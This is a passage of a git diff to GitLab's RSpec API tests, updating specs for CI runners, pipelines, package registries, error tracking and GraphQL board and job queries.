/projects/:id/jobs/:job_id/artifacts/keep' do - before do - post api("/projects/#{project.id}/jobs/#{job.id}/artifacts/keep", user) - end - - context 'artifacts did not expire' do - let(:job) do - create(:ci_build, :trace_artifact, :artifacts, :success, - project: project, pipeline: pipeline, artifacts_expire_at: Time.now + 7.days) - end - - it 'keeps artifacts' do - expect(response).to have_gitlab_http_status(:ok) - expect(job.reload.artifacts_expire_at).to be_nil - end - end - - context 'no artifacts' do - let(:job) { create(:ci_build, project: project, pipeline: pipeline) } - - it 'responds with not found' do - expect(response).to have_gitlab_http_status(:not_found) - end - end - end - describe 'POST /projects/:id/jobs/:job_id/play' do before do post api("/projects/#{project.id}/jobs/#{job.id}/play", api_user) diff --git a/spec/requests/api/ci/pipelines_spec.rb b/spec/requests/api/ci/pipelines_spec.rb index 7ae350885f4..13838cffd76 100644 --- a/spec/requests/api/ci/pipelines_spec.rb +++ b/spec/requests/api/ci/pipelines_spec.rb @@ -33,6 +33,7 @@ RSpec.describe API::Ci::Pipelines do expect(json_response).to be_an Array expect(json_response.first['sha']).to match(/\A\h{40}\z/) expect(json_response.first['id']).to eq pipeline.id + expect(json_response.first['iid']).to eq pipeline.iid expect(json_response.first['web_url']).to be_present end @@ -40,7 +41,7 @@ RSpec.describe API::Ci::Pipelines do it 'includes pipeline source' do get api("/projects/#{project.id}/pipelines", user) - expect(json_response.first.keys).to contain_exactly(*%w[id project_id sha ref status web_url created_at updated_at source]) + expect(json_response.first.keys).to contain_exactly(*%w[id iid project_id sha ref status web_url created_at updated_at source]) end end @@ -840,7 +841,7 @@ RSpec.describe API::Ci::Pipelines do it 'exposes the coverage' do get api("/projects/#{project.id}/pipelines/#{pipeline.id}", user) - expect(json_response["coverage"].to_i).to eq(30) + expect(json_response["coverage"]).to eq('30.00') end end end diff --git a/spec/requests/api/ci/runner/jobs_artifacts_spec.rb b/spec/requests/api/ci/runner/jobs_artifacts_spec.rb index 195aac2e5f0..f627f207d98 100644 --- a/spec/requests/api/ci/runner/jobs_artifacts_spec.rb +++ b/spec/requests/api/ci/runner/jobs_artifacts_spec.rb @@ -131,8 +131,8 @@ RSpec.describe API::Ci::Runner, :clean_gitlab_redis_shared_state do let(:send_request) { subject } end - it 'updates runner info' do - expect { subject }.to change { runner.reload.contacted_at } + it "doesn't update runner info" do + expect { subject }.not_to change { runner.reload.contacted_at } end shared_examples 'authorizes local file' do @@ -280,8 +280,8 @@ RSpec.describe API::Ci::Runner, :clean_gitlab_redis_shared_state do end end - it 'updates runner info' do - expect { upload_artifacts(file_upload, headers_with_token) }.to change { runner.reload.contacted_at } + it "doesn't update runner info" do + expect { upload_artifacts(file_upload, headers_with_token) }.not_to change { runner.reload.contacted_at } end context 'when the artifact is too large' do @@ -812,8 +812,8 @@ RSpec.describe API::Ci::Runner, :clean_gitlab_redis_shared_state do let(:send_request) { download_artifact } end - it 'updates runner info' do - expect { download_artifact }.to change { runner.reload.contacted_at } + it "doesn't update runner info" do + expect { download_artifact }.not_to change { runner.reload.contacted_at } end context 'when job has artifacts' do diff --git a/spec/requests/api/ci/runner/jobs_request_post_spec.rb b/spec/requests/api/ci/runner/jobs_request_post_spec.rb index fdf1a278d4c..68f7581bf06 100644 --- a/spec/requests/api/ci/runner/jobs_request_post_spec.rb +++ b/spec/requests/api/ci/runner/jobs_request_post_spec.rb @@ -833,8 +833,8 @@ RSpec.describe API::Ci::Runner, :clean_gitlab_redis_shared_state do let(:expected_params) { { project: project.full_path, client_id: "runner/#{runner.id}" } } end - it_behaves_like 'not executing any extra queries for the application context', 2 do - # Extra queries: Project, Route + it_behaves_like 'not executing any extra queries for the application context', 3 do + # Extra queries: Project, Route, RunnerProject let(:subject_proc) { proc { request_job } } end end diff --git a/spec/requests/api/ci/runner/runners_post_spec.rb b/spec/requests/api/ci/runner/runners_post_spec.rb index b3a7d591c93..a51d8b458f8 100644 --- a/spec/requests/api/ci/runner/runners_post_spec.rb +++ b/spec/requests/api/ci/runner/runners_post_spec.rb @@ -98,33 +98,14 @@ RSpec.describe API::Ci::Runner, :clean_gitlab_redis_shared_state do before do create(:ci_runner, runner_type: :project_type, projects: [project], contacted_at: 1.second.ago) create(:plan_limits, :default_plan, ci_registered_project_runners: 1) - - skip_default_enabled_yaml_check - stub_feature_flags(ci_runner_limits_override: ci_runner_limits_override) - end - - context 'with ci_runner_limits_override FF disabled' do - let(:ci_runner_limits_override) { false } - - it 'does not create runner' do - request - - expect(response).to have_gitlab_http_status(:bad_request) - expect(json_response['message']).to include('runner_projects.base' => ['Maximum number of ci registered project runners (1) exceeded']) - expect(project.runners.reload.size).to eq(1) - end end - context 'with ci_runner_limits_override FF enabled' do - let(:ci_runner_limits_override) { true } - - it 'creates runner' do - request + it 'does not create runner' do + request - expect(response).to have_gitlab_http_status(:created) - expect(json_response['message']).to be_nil - expect(project.runners.reload.size).to eq(2) - end + expect(response).to have_gitlab_http_status(:bad_request) + expect(json_response['message']).to include('runner_projects.base' => ['Maximum number of ci registered project runners (1) exceeded']) + expect(project.runners.reload.size).to eq(1) end end @@ -132,9 +113,6 @@ RSpec.describe API::Ci::Runner, :clean_gitlab_redis_shared_state do before do create(:ci_runner, runner_type: :project_type, projects: [project], created_at: 14.months.ago, contacted_at: 13.months.ago) create(:plan_limits, :default_plan, ci_registered_project_runners: 1) - - skip_default_enabled_yaml_check - stub_feature_flags(ci_runner_limits_override: false) end it 'creates runner' do @@ -204,33 +182,14 @@ RSpec.describe API::Ci::Runner, :clean_gitlab_redis_shared_state do before do create(:ci_runner, runner_type: :group_type, groups: [group], contacted_at: nil, created_at: 1.month.ago) create(:plan_limits, :default_plan, ci_registered_group_runners: 1) - - skip_default_enabled_yaml_check - stub_feature_flags(ci_runner_limits_override: ci_runner_limits_override) - end - - context 'with ci_runner_limits_override FF disabled' do - let(:ci_runner_limits_override) { false } - - it 'does not create runner' do - request - - expect(response).to have_gitlab_http_status(:bad_request) - expect(json_response['message']).to include('runner_namespaces.base' => ['Maximum number of ci registered group runners (1) exceeded']) - expect(group.runners.reload.size).to eq(1) - end end - context 'with ci_runner_limits_override FF enabled' do - let(:ci_runner_limits_override) { true } - - it 'creates runner' do - request + it 'does not create runner' do + request - expect(response).to have_gitlab_http_status(:created) - expect(json_response['message']).to be_nil - expect(group.runners.reload.size).to eq(2) - end + expect(response).to have_gitlab_http_status(:bad_request) + expect(json_response['message']).to include('runner_namespaces.base' => ['Maximum number of ci registered group runners (1) exceeded']) + expect(group.runners.reload.size).to eq(1) end end @@ -239,9 +198,6 @@ RSpec.describe API::Ci::Runner, :clean_gitlab_redis_shared_state do create(:ci_runner, runner_type: :group_type, groups: [group], created_at: 4.months.ago, contacted_at: 3.months.ago) create(:ci_runner, runner_type: :group_type, groups: [group], contacted_at: nil, created_at: 4.months.ago) create(:plan_limits, :default_plan, ci_registered_group_runners: 1) - - skip_default_enabled_yaml_check - stub_feature_flags(ci_runner_limits_override: false) end it 'creates runner' do diff --git a/spec/requests/api/ci/runners_spec.rb b/spec/requests/api/ci/runners_spec.rb index 6879dfc9572..6ca380a3cb9 100644 --- a/spec/requests/api/ci/runners_spec.rb +++ b/spec/requests/api/ci/runners_spec.rb @@ -254,6 +254,7 @@ RSpec.describe API::Ci::Runners do expect(response).to have_gitlab_http_status(:ok) expect(json_response['description']).to eq(shared_runner.description) expect(json_response['maximum_timeout']).to be_nil + expect(json_response['status']).to eq("not_connected") end end @@ -1101,31 +1102,13 @@ RSpec.describe API::Ci::Runners do context 'when it exceeds the application limits' do before do create(:plan_limits, :default_plan, ci_registered_project_runners: 1) - - skip_default_enabled_yaml_check - stub_feature_flags(ci_runner_limits_override: ci_runner_limits_override) end - context 'with ci_runner_limits_override FF disabled' do - let(:ci_runner_limits_override) { false } - - it 'does not enable specific runner' do - expect do - post api("/projects/#{project.id}/runners", admin), params: { runner_id: new_project_runner.id } - end.not_to change { project.runners.count } - expect(response).to have_gitlab_http_status(:bad_request) - end - end - - context 'with ci_runner_limits_override FF enabled' do - let(:ci_runner_limits_override) { true } - - it 'enables specific runner' do - expect do - post api("/projects/#{project.id}/runners", admin), params: { runner_id: new_project_runner.id } - end.to change { project.runners.count } - expect(response).to have_gitlab_http_status(:created) - end + it 'does not enable specific runner' do + expect do + post api("/projects/#{project.id}/runners", admin), params: { runner_id: new_project_runner.id } + end.not_to change { project.runners.count } + expect(response).to have_gitlab_http_status(:bad_request) end end end diff --git a/spec/requests/api/commit_statuses_spec.rb b/spec/requests/api/commit_statuses_spec.rb index 47bc3eb74a6..39be28d7427 100644 --- a/spec/requests/api/commit_statuses_spec.rb +++ b/spec/requests/api/commit_statuses_spec.rb @@ -14,8 +14,19 @@ RSpec.describe API::CommitStatuses do let(:get_url) { "/projects/#{project.id}/repository/commits/#{sha}/statuses" } context 'ci commit exists' do - let!(:master) { project.ci_pipelines.create!(source: :push, sha: commit.id, ref: 'master', protected: false) } - let!(:develop) { project.ci_pipelines.create!(source: :push, sha: commit.id, ref: 'develop', protected: false) } + let!(:master) do + project.ci_pipelines.build(source: :push, sha: commit.id, ref: 'master', protected: false).tap do |p| + p.ensure_project_iid! # Necessary to avoid cross-database modification error + p.save! + end + end + + let!(:develop) do + project.ci_pipelines.build(source: :push, sha: commit.id, ref: 'develop', protected: false).tap do |p| + p.ensure_project_iid! # Necessary to avoid cross-database modification error + p.save! + end + end context "reporter user" do let(:statuses_id) { json_response.map { |status| status['id'] } } @@ -131,7 +142,7 @@ RSpec.describe API::CommitStatuses do %w[pending running success failed canceled].each do |status| context "for #{status}" do context 'when pipeline for sha does not exists' do - it 'creates commit status' do + it 'creates commit status and sets pipeline iid' do post api(post_url, developer), params: { state: status } expect(response).to have_gitlab_http_status(:created) @@ -145,6 +156,8 @@ RSpec.describe API::CommitStatuses do if status == 'failed' expect(CommitStatus.find(json_response['id'])).to be_api_failure end + + expect(::Ci::Pipeline.last.iid).not_to be_nil end end end @@ -308,8 +321,19 @@ RSpec.describe API::CommitStatuses do end context 'when a pipeline id is specified' do - let!(:first_pipeline) { project.ci_pipelines.create!(source: :push, sha: commit.id, ref: 'master', status: 'created') } - let!(:other_pipeline) { project.ci_pipelines.create!(source: :push, sha: commit.id, ref: 'master', status: 'created') } + let!(:first_pipeline) do + project.ci_pipelines.build(source: :push, sha: commit.id, ref: 'master', status: 'created').tap do |p| + p.ensure_project_iid! # Necessary to avoid cross-database modification error + p.save! + end + end + + let!(:other_pipeline) do + project.ci_pipelines.build(source: :push, sha: commit.id, ref: 'master', status: 'created').tap do |p| + p.ensure_project_iid! # Necessary to avoid cross-database modification error + p.save! + end + end subject do post api(post_url, developer), params: { diff --git a/spec/requests/api/commits_spec.rb b/spec/requests/api/commits_spec.rb index 1d76c281dee..1e587480fd9 100644 --- a/spec/requests/api/commits_spec.rb +++ b/spec/requests/api/commits_spec.rb @@ -377,11 +377,11 @@ RSpec.describe API::Commits do end context 'when using warden' do - it 'increments usage counters', :clean_gitlab_redis_shared_state do + it 'increments usage counters', :clean_gitlab_redis_sessions do session_id = Rack::Session::SessionId.new('6919a6f1bb119dd7396fadc38fd18d0d') session_hash = { 'warden.user.user.key' => [[user.id], user.encrypted_password[0, 29]] } - Gitlab::Redis::SharedState.with do |redis| + Gitlab::Redis::Sessions.with do |redis| redis.set("session:gitlab:#{session_id.private_id}", Marshal.dump(session_hash)) end diff --git a/spec/requests/api/composer_packages_spec.rb b/spec/requests/api/composer_packages_spec.rb index e75725cacba..21b4634ce25 100644 --- a/spec/requests/api/composer_packages_spec.rb +++ b/spec/requests/api/composer_packages_spec.rb @@ -9,6 +9,10 @@ RSpec.describe API::ComposerPackages do let_it_be(:personal_access_token) { create(:personal_access_token, user: user) } let_it_be(:package_name) { 'package-name' } let_it_be(:project, reload: true) { create(:project, :custom_repo, files: { 'composer.json' => { name: package_name }.to_json }, group: group) } + let_it_be(:deploy_token_for_project) { create(:deploy_token, read_package_registry: true, write_package_registry: true) } + let_it_be(:project_deploy_token) { create(:project_deploy_token, deploy_token: deploy_token_for_project, project: project) } + let_it_be(:deploy_token_for_group) { create(:deploy_token, :group, read_package_registry: true, write_package_registry: true) } + let_it_be(:group_deploy_token) { create(:group_deploy_token, deploy_token: deploy_token_for_group, group: group) } let(:snowplow_gitlab_standard_context) { { project: project, namespace: project.namespace, user: user } } let(:headers) { {} } @@ -92,6 +96,8 @@ RSpec.describe API::ComposerPackages do group.update!(visibility_level: Gitlab::VisibilityLevel::PRIVATE) end + it_behaves_like 'Composer access with deploy tokens' + context 'with access to the api' do where(:project_visibility_level, :user_role, :member, :user_token, :include_package) do 'PRIVATE' | :developer | true | true | :include_package @@ -162,6 +168,8 @@ RSpec.describe API::ComposerPackages do it_behaves_like params[:shared_examples_name], params[:user_role], params[:expected_status], params[:member] end end + + it_behaves_like 'Composer access with deploy tokens' end it_behaves_like 'rejects Composer access with unknown group id' @@ -219,6 +227,8 @@ RSpec.describe API::ComposerPackages do end end end + + it_behaves_like 'Composer access with deploy tokens' end it_behaves_like 'rejects Composer access with unknown group id' @@ -265,6 +275,8 @@ RSpec.describe API::ComposerPackages do it_behaves_like params[:shared_examples_name], params[:user_role], params[:expected_status], params[:member] end end + + it_behaves_like 'Composer access with deploy tokens' end it_behaves_like 'rejects Composer access with unknown group id' @@ -308,6 +320,8 @@ RSpec.describe API::ComposerPackages do it_behaves_like params[:shared_examples_name], params[:user_role], params[:expected_status], params[:member] end end + + it_behaves_like 'Composer publish with deploy tokens' end it_behaves_like 'rejects Composer access with unknown project id' diff --git a/spec/requests/api/conan_project_packages_spec.rb b/spec/requests/api/conan_project_packages_spec.rb index da054ed2e96..c108f2efaaf 100644 --- a/spec/requests/api/conan_project_packages_spec.rb +++ b/spec/requests/api/conan_project_packages_spec.rb @@ -1,10 +1,11 @@ # frozen_string_literal: true require 'spec_helper' -RSpec.describe API::ConanProjectPackages, quarantine: 'https://gitlab.com/gitlab-org/gitlab/-/issues/326194' do +RSpec.describe API::ConanProjectPackages do include_context 'conan api setup' let(:project_id) { project.id } + let(:snowplow_standard_context_params) { { user: user, project: project, namespace: project.namespace } } describe 'GET /api/v4/projects/:id/packages/conan/v1/ping' do let(:url) { "/projects/#{project.id}/packages/conan/v1/ping" } @@ -92,7 +93,7 @@ RSpec.describe API::ConanProjectPackages, quarantine: 'https://gitlab.com/gitlab end end - context 'file download endpoints' do + context 'file download endpoints', quarantine: 'https://gitlab.com/gitlab-org/gitlab/-/issues/326194' do include_context 'conan file download endpoints' describe 'GET /api/v4/projects/:id/packages/conan/v1/files/:package_name/package_version/:package_username/:package_channel/ diff --git a/spec/requests/api/dependency_proxy_spec.rb b/spec/requests/api/dependency_proxy_spec.rb index 2837d1c02c4..067852ef1e9 100644 --- a/spec/requests/api/dependency_proxy_spec.rb +++ b/spec/requests/api/dependency_proxy_spec.rb @@ -3,8 +3,6 @@ require 'spec_helper' RSpec.describe API::DependencyProxy, api: true do - include ExclusiveLeaseHelpers - let_it_be(:user) { create(:user) } let_it_be(:blob) { create(:dependency_proxy_blob )} let_it_be(:group, reload: true) { blob.group } @@ -20,11 +18,8 @@ RSpec.describe API::DependencyProxy, api: true do shared_examples 'responding to purge requests' do context 'with feature available and enabled' do - let_it_be(:lease_key) { "dependency_proxy:delete_group_blobs:#{group.id}" } - context 'an admin user' do it 'deletes the blobs and returns no content' do - stub_exclusive_lease(lease_key, timeout: 1.hour) expect(PurgeDependencyProxyCacheWorker).to receive(:perform_async) subject @@ -32,23 +27,6 @@ RSpec.describe API::DependencyProxy, api: true do expect(response).to have_gitlab_http_status(:accepted) expect(response.body).to eq('202') end - - context 'called multiple times in one hour', :clean_gitlab_redis_shared_state do - it 'returns 409 with an error message' do - stub_exclusive_lease_taken(lease_key, timeout: 1.hour) - - subject - - expect(response).to have_gitlab_http_status(:conflict) - expect(response.body).to include('This request has already been made.') - end - - it 'executes service only for the first time' do - expect(PurgeDependencyProxyCacheWorker).to receive(:perform_async).once - - 2.times { subject } - end - end end context 'a non-admin' do diff --git a/spec/requests/api/error_tracking/collector_spec.rb b/spec/requests/api/error_tracking/collector_spec.rb index 21e2849fef0..573da862b57 100644 --- a/spec/requests/api/error_tracking/collector_spec.rb +++ b/spec/requests/api/error_tracking/collector_spec.rb @@ -24,7 +24,7 @@ RSpec.describe API::ErrorTracking::Collector do end RSpec.shared_examples 'successful request' do - it 'writes to the database and returns OK' do + it 'writes to the database and returns OK', :aggregate_failures do expect { subject }.to change { ErrorTracking::ErrorEvent.count }.by(1) expect(response).to have_gitlab_http_status(:ok) @@ -40,6 +40,8 @@ RSpec.describe API::ErrorTracking::Collector do subject { post api(url), params: params, headers: headers } + it_behaves_like 'successful request' + context 'error tracking feature is disabled' do before do setting.update!(enabled: false) @@ -109,8 +111,6 @@ RSpec.describe API::ErrorTracking::Collector do it_behaves_like 'successful request' end - - it_behaves_like 'successful request' end describe "POST /error_tracking/collector/api/:id/store" do @@ -165,6 +165,12 @@ RSpec.describe API::ErrorTracking::Collector do it_behaves_like 'successful request' end + context 'body contains nullbytes' do + let_it_be(:raw_event) { fixture_file('error_tracking/parsed_event_nullbytes.json') } + + it_behaves_like 'successful request' + end + context 'sentry_key as param and empty headers' do let(:url) { "/error_tracking/collector/api/#{project.id}/store?sentry_key=#{sentry_key}" } let(:headers) { {} } diff --git a/spec/requests/api/graphql/boards/board_list_issues_query_spec.rb b/spec/requests/api/graphql/boards/board_list_issues_query_spec.rb index 241c658441b..6324db0be4a 100644 --- a/spec/requests/api/graphql/boards/board_list_issues_query_spec.rb +++ b/spec/requests/api/graphql/boards/board_list_issues_query_spec.rb @@ -16,6 +16,7 @@ RSpec.describe 'get board lists' do let(:params) { '' } let(:board) { } + let(:confidential) { false } let(:board_parent_type) { board_parent.class.to_s.downcase } let(:board_data) { graphql_data[board_parent_type]['boards']['nodes'][0] } let(:lists_data) { board_data['lists']['nodes'][0] } @@ -30,7 +31,7 @@ RSpec.describe 'get board lists' do nodes { lists { nodes { - issues(filters: {labelName: "#{label2.title}"}, first: 3) { + issues(filters: {labelName: "#{label2.title}", confidential: #{confidential}}, first: 3) { count nodes { #{all_graphql_fields_for('issues'.classify)} @@ -57,14 +58,15 @@ RSpec.describe 'get board lists' do end shared_examples 'group and project board list issues query' do - let!(:board) { create(:board, resource_parent: board_parent) } - let!(:label_list) { create(:list, board: board, label: label, position: 10) } - let!(:issue1) { create(:issue, project: issue_project, labels: [label, label2], relative_position: 9) } - let!(:issue2) { create(:issue, project: issue_project, labels: [label, label2], relative_position: 2) } - let!(:issue3) { create(:issue, project: issue_project, labels: [label, label2], relative_position: nil) } - let!(:issue4) { create(:issue, project: issue_project, labels: [label], relative_position: 9) } - let!(:issue5) { create(:issue, project: issue_project, labels: [label2], relative_position: 432) } - let!(:issue6) { create(:issue, project: issue_project, labels: [label, label2], relative_position: nil) } + let_it_be(:board) { create(:board, resource_parent: board_parent) } + let_it_be(:label_list) { create(:list, board: board, label: label, position: 10) } + let_it_be(:issue1) { create(:issue, project: issue_project, labels: [label, label2], relative_position: 9) } + let_it_be(:issue2) { create(:issue, project: issue_project, labels: [label, label2], relative_position: 2) } + let_it_be(:issue3) { create(:issue, project: issue_project, labels: [label, label2], relative_position: nil) } + let_it_be(:issue4) { create(:issue, project: issue_project, labels: [label], relative_position: 9) } + let_it_be(:issue5) { create(:issue, project: issue_project, labels: [label2], relative_position: 432) } + let_it_be(:issue6) { create(:issue, project: issue_project, labels: [label, label2], relative_position: nil) } + let_it_be(:issue7) { create(:issue, project: issue_project, labels: [label, label2], relative_position: 5, confidential: true) } context 'when the user does not have access to the board' do it 'returns nil' do @@ -90,23 +92,33 @@ RSpec.describe 'get board lists' do expect(issue_id).not_to include(issue6.id) expect(issue3.relative_position).to be_nil end + + context 'when filtering by confidential' do + let(:confidential) { true } + + it 'returns matching issue' do + expect(issue_titles).to match_array([issue7.title]) + expect(issue_relative_positions).not_to include(nil) + end + end end end describe 'for a project' do - let(:board_parent) { project } - let(:label) { project_label } - let(:label2) { project_label2 } - let(:issue_project) { project } + let_it_be(:board_parent) { project } + let_it_be(:label) { project_label } + let_it_be(:label2) { project_label2 } + let_it_be(:issue_project) { project } it_behaves_like 'group and project board list issues query' end describe 'for a group' do - let(:board_parent) { group } - let(:label) { group_label } - let(:label2) { group_label2 } - let(:issue_project) { create(:project, :private, group: group) } + let_it_be(:board_parent) { group } + let_it_be(:label) { group_label } + let_it_be(:label2) { group_label2 } + + let_it_be(:issue_project) { create(:project, :private, group: group) } before do allow(board_parent).to receive(:multiple_issue_boards_available?).and_return(false) diff --git a/spec/requests/api/graphql/boards/board_list_query_spec.rb b/spec/requests/api/graphql/boards/board_list_query_spec.rb index dec7ca715f2..f01f7e87f10 100644 --- a/spec/requests/api/graphql/boards/board_list_query_spec.rb +++ b/spec/requests/api/graphql/boards/board_list_query_spec.rb @@ -12,6 +12,7 @@ RSpec.describe 'Querying a Board list' do let_it_be(:list) { create(:list, board: board, label: label) } let_it_be(:issue1) { create(:issue, project: project, labels: [label]) } let_it_be(:issue2) { create(:issue, project: project, labels: [label], assignees: [current_user]) } + let_it_be(:issue3) { create(:issue, project: project, labels: [label], confidential: true) } let(:filters) { {} } let(:query) do @@ -37,19 +38,33 @@ RSpec.describe 'Querying a Board list' do it { is_expected.to include({ 'issuesCount' => 2, 'title' => list.title }) } - context 'with matching issue filters' do - let(:filters) { { assigneeUsername: current_user.username } } + describe 'issue filters' do + context 'with matching assignee username issue filters' do + let(:filters) { { assigneeUsername: current_user.username } } - it 'filters issues metadata' do - is_expected.to include({ 'issuesCount' => 1, 'title' => list.title }) + it 'filters issues metadata' do + is_expected.to include({ 'issuesCount' => 1, 'title' => list.title }) + end end - end - context 'with unmatching issue filters' do - let(:filters) { { assigneeUsername: 'foo' } } + context 'with unmatching assignee username issue filters' do + let(:filters) { { assigneeUsername: 'foo' } } + + it 'filters issues metadata' do + is_expected.to include({ 'issuesCount' => 0, 'title' => list.title }) + end + end + + context 'when filtering by confidential' do + let(:filters) { { confidential: true } } + + before_all do + project.add_developer(current_user) + end - it 'filters issues metadata' do - is_expected.to include({ 'issuesCount' => 0, 'title' => list.title }) + it 'filters issues metadata' do + is_expected.to include({ 'issuesCount' => 1, 'title' => list.title }) + end end end end diff --git a/spec/requests/api/graphql/boards/board_lists_query_spec.rb b/spec/requests/api/graphql/boards/board_lists_query_spec.rb index ace8c59e82d..e8fb9daa43b 100644 --- a/spec/requests/api/graphql/boards/board_lists_query_spec.rb +++ b/spec/requests/api/graphql/boards/board_lists_query_spec.rb @@ -109,9 +109,15 @@ RSpec.describe 'get board lists' do it 'returns the correct list with issue count for matching issue filters' do label_list = create(:list, board: board, label: label, position: 10) create(:issue, project: project, labels: [label, label2]) + create(:issue, project: project, labels: [label, label2], confidential: true) create(:issue, project: project, labels: [label]) - post_graphql(query(id: global_id_of(label_list), issueFilters: { labelName: label2.title }), current_user: user) + post_graphql( + query( + id: global_id_of(label_list), + issueFilters: { labelName: label2.title, confidential: false } + ), current_user: user + ) aggregate_failures do list_node = lists_data[0]['node'] diff --git a/spec/requests/api/graphql/ci/jobs_spec.rb b/spec/requests/api/graphql/ci/jobs_spec.rb index b2f4801a083..3a1df3525ef 100644 --- a/spec/requests/api/graphql/ci/jobs_spec.rb +++ b/spec/requests/api/graphql/ci/jobs_spec.rb @@ -14,8 +14,8 @@ RSpec.describe 'Query.project.pipeline' do describe '.stages.groups.jobs' do let(:pipeline) do pipeline = create(:ci_pipeline, project: project, user: user) - stage = create(:ci_stage_entity, project: project, pipeline: pipeline, name: 'first') - create(:ci_build, stage_id: stage.id, pipeline: pipeline, name: 'my test job') + stage = create(:ci_stage_entity, project: project, pipeline: pipeline, name: 'first', position: 1) + create(:ci_build, stage_id: stage.id, pipeline: pipeline, name: 'my test job', scheduling_type: :stage) pipeline end @@ -44,13 +44,23 @@ RSpec.describe 'Query.project.pipeline' do name jobs { nodes { - detailedStatus { - id - } name needs { nodes { #{all_graphql_fields_for('CiBuildNeed')} } } + previousStageJobsOrNeeds { + nodes { + ... on CiBuildNeed { + #{all_graphql_fields_for('CiBuildNeed')} + } + ... on CiJob { + #{all_graphql_fields_for('CiJob')} + } + } + } + detailedStatus { + id + } pipeline { id } @@ -62,58 +72,61 @@ RSpec.describe 'Query.project.pipeline' do FIELDS end - context 'when there are build needs' do - before do - pipeline.statuses.each do |build| - create_list(:ci_build_need, 2, build: build) - end - end - - it 'reports the build needs' do - post_graphql(query, current_user: user) - - expect(jobs_graphql_data).to contain_exactly a_hash_including( - 'needs' => a_hash_including( - 'nodes' => contain_exactly( - a_hash_including('name' => String), - a_hash_including('name' => String) - ) - ) - ) - end - end - it 'returns the jobs of a pipeline stage' do post_graphql(query, current_user: user) expect(jobs_graphql_data).to contain_exactly(a_hash_including('name' => 'my test job')) end - describe 'performance' do + context 'when there is more than one stage and job needs' do before do build_stage = create(:ci_stage_entity, position: 2, name: 'build', project: project, pipeline: pipeline) test_stage = create(:ci_stage_entity, position: 3, name: 'test', project: project, pipeline: pipeline) - create(:commit_status, pipeline: pipeline, stage_id: build_stage.id, name: 'docker 1 2') - create(:commit_status, pipeline: pipeline, stage_id: build_stage.id, name: 'docker 2 2') - create(:commit_status, pipeline: pipeline, stage_id: test_stage.id, name: 'rspec 1 2') - create(:commit_status, pipeline: pipeline, stage_id: test_stage.id, name: 'rspec 2 2') - end - it 'can find the first stage' do - post_graphql(query, current_user: user, variables: first_n.with(1)) + create(:ci_build, pipeline: pipeline, name: 'docker 1 2', scheduling_type: :stage, stage: build_stage, stage_idx: build_stage.position) + create(:ci_build, pipeline: pipeline, name: 'docker 2 2', stage: build_stage, stage_idx: build_stage.position, scheduling_type: :dag) + create(:ci_build, pipeline: pipeline, name: 'rspec 1 2', scheduling_type: :stage, stage: test_stage, stage_idx: test_stage.position) + test_job = create(:ci_build, pipeline: pipeline, name: 'rspec 2 2', scheduling_type: :dag, stage: test_stage, stage_idx: test_stage.position) - expect(jobs_graphql_data).to contain_exactly(a_hash_including('name' => 'my test job')) + create(:ci_build_need, build: test_job, name: 'my test job') end - it 'reports the build needs and previous stages with no duplicates', quarantine: 'https://gitlab.com/gitlab-org/gitlab/-/issues/346433' do + it 'reports the build needs and execution requirements', quarantine: 'https://gitlab.com/gitlab-org/gitlab/-/issues/347290' do post_graphql(query, current_user: user) expect(jobs_graphql_data).to contain_exactly( - a_hash_including('name' => 'my test job'), - a_hash_including('name' => 'docker 1 2'), - a_hash_including('name' => 'docker 2 2'), - a_hash_including('name' => 'rspec 1 2'), - a_hash_including('name' => 'rspec 2 2') + a_hash_including( + 'name' => 'my test job', + 'needs' => { 'nodes' => [] }, + 'previousStageJobsOrNeeds' => { 'nodes' => [] } + ), + a_hash_including( + 'name' => 'docker 1 2', + 'needs' => { 'nodes' => [] }, + 'previousStageJobsOrNeeds' => { 'nodes' => [ + a_hash_including( 'name' => 'my test job' ) + ] } + ), + a_hash_including( + 'name' => 'docker 2 2', + 'needs' => { 'nodes' => [] }, + 'previousStageJobsOrNeeds' => { 'nodes' => [] } + ), + a_hash_including( + 'name' => 'rspec 1 2', + 'needs' => { 'nodes' => [] }, + 'previousStageJobsOrNeeds' => { 'nodes' => [ + a_hash_including('name' => 'docker 1 2'), + a_hash_including('name' => 'docker 2 2') + ] } + ), + a_hash_including( + 'name' => 'rspec 2 2', + 'needs' => { 'nodes' => [a_hash_including('name' => 'my test job')] }, + 'previousStageJobsOrNeeds' => { 'nodes' => [ + a_hash_including('name' => 'my test job' ) + ] } + ) ) end diff --git a/spec/requests/api/graphql/ci/pipelines_spec.rb b/spec/requests/api/graphql/ci/pipelines_spec.rb index 1f47f678898..95ddd0250e7 100644 --- a/spec/requests/api/graphql/ci/pipelines_spec.rb +++ b/spec/requests/api/graphql/ci/pipelines_spec.rb @@ -79,12 +79,13 @@ RSpec.describe 'Query.project(fullPath).pipelines' do create(:ci_build, pipeline: pipeline, stage_id: other_stage.id, name: 'linux: [baz]') end - it 'is null if the user is a guest' do + it 'is present if the user has guest access' do project.add_guest(user) - post_graphql(query, current_user: user, variables: first_n.with(1)) + post_graphql(query, current_user: user) - expect(graphql_data_at(:project, :pipelines, :nodes)).to contain_exactly a_hash_including('stages' => be_nil) + expect(graphql_data_at(:project, :pipelines, :nodes, :stages, :nodes, :name)) + .to contain_exactly(eq(stage.name), eq(other_stage.name)) end it 'is present if the user has reporter access' do @@ -113,12 +114,13 @@ RSpec.describe 'Query.project(fullPath).pipelines' do wrap_fields(query_graphql_path(query_path, :name)) end - it 'is empty if the user is a guest' do + it 'is present if the user has guest access' do project.add_guest(user) post_graphql(query, current_user: user) - expect(graphql_data_at(:project, :pipelines, :nodes, :stages, :nodes, :groups)).to be_empty + expect(graphql_data_at(:project, :pipelines, :nodes, :stages, :nodes, :groups, :nodes, :name)) + .to contain_exactly('linux', 'linux') end it 'is present if the user has reporter access' do diff --git a/spec/requests/api/graphql/ci/runner_spec.rb b/spec/requests/api/graphql/ci/runner_spec.rb index ab53ff654e9..98d3a3b1c51 100644 --- a/spec/requests/api/graphql/ci/runner_spec.rb +++ b/spec/requests/api/graphql/ci/runner_spec.rb @@ -63,7 +63,7 @@ RSpec.describe 'Query.runner(id)' do 'revision' => runner.revision, 'locked' => false, 'active' => runner.active, - 'status' => runner.status.to_s.upcase, + 'status' => runner.status('14.5').to_s.upcase, 'maximumTimeout' => runner.maximum_timeout, 'accessLevel' => runner.access_level.to_s.upcase, 'runUntagged' => runner.run_untagged, @@ -221,6 +221,54 @@ RSpec.describe 'Query.runner(id)' do end end + describe 'for runner with status' do + let_it_be(:stale_runner) { create(:ci_runner, description: 'Stale runner 1', created_at: 3.months.ago) } + let_it_be(:never_contacted_instance_runner) { create(:ci_runner, description: 